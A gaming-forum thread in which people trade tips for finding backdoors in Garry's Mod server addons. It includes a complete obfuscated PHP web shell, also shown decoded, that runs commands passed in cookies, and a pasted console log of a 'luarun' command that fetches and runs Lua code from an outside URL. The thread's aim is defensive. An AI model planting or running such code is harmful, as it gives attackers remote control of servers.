Garry's Mod

How to spot backdoor addons?

Submitted by yushikiki, , Thread ID: 142410

Thread Closed
05-09-2019, 07:49 PM
#1
hello is there any tips to spot back door addons or remove their back door

apratenly i have some addons downloded in codder fodder

But Somes times rare my admin acces gets revokes

then now happened a hack idk mysic played in the game

and spooky dancin

And it says back door proof Leaked but this happened after i installed rape sweep from workshop

RE: How to spot backdoor addons?

#2
Well, you'll need to learn how to read code - that's a given.
But you should definitely see what the music file is called, and run ctrl+f in all of the .lua files of it.

Keep in mind, some backdoors are pretty hard to remove, my friend got rid of all of the backdoor stuff from her leaked gmod addons, but still had it crash on her.
That stuff is insidious.

RE: How to spot backdoor addons?

OP
#3
i tried the Nomula scan tho It showed some steams id, of developers falcon etc

Anyways thanks but any others suggestion?

RE: How to spot backdoor addons?

This post was last modified: 06-09-2019, 01:36 PM by Zendra
#4
There are many tips for spot the backdoor... but if the developer is good ... it's gonna be hard detect it ...

At first, you probably need to analyze the traffic in your computer, with wireshark for example, and detect which port, program and other stuff actually using it (you probably are gonna to encounter something strange ... well, let's write it in a note pad, you can analyze it after).

At the second, you can block the traffic on port for temporany stop the connection to the hacker.

In the end you probably need to know a bit of assembly and attach a debbuger to program/dll/file that have the backdoor (ollydbg is good, but you can follow with IDA PRO or x96) .... that's really hard to complete, so in my advise is: if you are not a research, just copy all the important file in to a exstern HD and formt your pc

Is really hard spot a backdoor if you have the source code too, because, all the becoor are usually encrypted, hased and obfuscated in to another file. There is an example of a backdoor in my site, long time ago!


<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>


Decoded:

<?php if (isset($_COOKIE['cm'])) {
ob_start();
system(base64_decode($_COOKIE['cm']) . ' 2>&1');
setcookie($_COOKIE['cn'], $_COOKIE['cp'] . base64_encode(ob_get_contents()) . $_COOKIE['cp']);
ob_end_clean();
}

that's backdoor for example decode the MYSQL connection
[Image: pGgwbhB.jpg]

RE: How to spot backdoor addons?

#5
You should look for "RunString", "_G", "http." and all that kind of bullshit before putting anything into your server and getting it infected. Also, you should look very carefully and check sv_ files with more attention to the contains. And, yes, most of the time, the code is obfuscated as fuck.

RE: How to spot backdoor addons?

OP
#6
Yo guys i just installed master anti cheat and a addon back door blocker, 500+ so far i havent see ulx remove rank

or infameous back door popup

i think it worked,

i also see on console

this:

Warning: Player issued command but is now vanished (Command was ""logehco" "0"")
Warning: Player issued command but is now vanished (Command was ""luarun" "http.Fetch('https://astillan.cf/uwu/core/stage1.php', RunString)"")
Warning: Player issued command but is now vanished (Command was ""logehco" "1"")

no idea but ithink its the backdoor ??? that anti cheat is blocking or black door blocker

RE: How to spot backdoor addons?

This post was last modified: 12-09-2019, 10:48 AM by ovlolxd
#7
Well, you'll need to learn how to read code - that's a given.
But you should definitely see what the music file is called, and run ctrl+f in all of the .lua files of it.

Keep in mind, some backdoors are pretty hard to remove, my friend got rid of all of the backdoor stuff from her leaked gmod addons, but still had it crash on her.
That stuff is insidious.

Content is locked.
You need 8 credits to unlock the hidden content.

RE: How to spot backdoor addons?

#8
Well you need to learn how to properly read code that's for sure

RE: How to spot backdoor addons?

#9
C.P.E - Anti-Backdoor very good checker on backdoors

RE: How to spot backdoor addons?

#10
If you have something that is in the files that does not have relevant material to what is being used in everything else, it is a backdoor.

Let's say you have something that is calling to use for something, you have something for it to determine off of earlier in the script that develops the line and functionality of it, then comes in to have it relevant again, but is tying something else in it to come through with it then it is made into that script as well to make it all function together as like almost a "cancer or tumor" in the script as all part of a 'total dynamic revolving script'.

If you know what you are looking at, you will be able to immediately determine what I am talking about... in most cases the whole script will be tied to this that if you find it and do just remove it, nothing will work.. you may have to rebuild the dynamics of the function for the whole overall script to perform. Good luck!

Users browsing this thread: 1 Guest(s)